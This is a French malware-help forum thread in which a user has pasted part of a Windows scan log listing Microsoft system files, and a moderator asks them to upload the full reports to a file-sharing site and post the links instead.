2019-05-09 20:13 - 2019-05-09 20:13 - 001145856 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001133568 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001072640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001058304 _____ (Microsoft Corporation) C:\WINDOWS\system32\IKEEXT.DLL
2019-05-09 20:13 - 2019-05-09 20:13 - 001057792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 001054928 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 001035776 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001026792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001001472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000998712 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 000984888 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 000982528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Vpn.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000981816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\refsv1.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 000976896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000964096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000948224 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000927232 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000926208 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000909840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 000888320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000884224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 000882176 _____ (Microsoft Corporation) C:\WINDOWS\system32\BFE.DLL
2019-05-09 20:13 - 2019-05-09 20:13 - 000877056 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.BackgroundMediaPlayback.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000874496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.BackgroundMediaPlayer
bazfile
Messages postés
56277
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
29 octobre 2024
19 241
10 mai 2019 à 10:55
10 mai 2019 à 10:55
Non ce sont les liens des rapports générés par PPjoint qui doivent être mis dans ta réponse pas le rapport il ne loge pas en entier, lis à nouveau mes instructions que je te rappelle:
envoie ces rapports sur https://pjjoint.malekal.com/ voir ce tutoriel paragraphe Envoyer les rapports d’analyse sur pjjoint puis donne les deux liens générés par Pjoint dans ton prochain message.
envoie ces rapports sur https://pjjoint.malekal.com/ voir ce tutoriel paragraphe Envoyer les rapports d’analyse sur pjjoint puis donne les deux liens générés par Pjoint dans ton prochain message.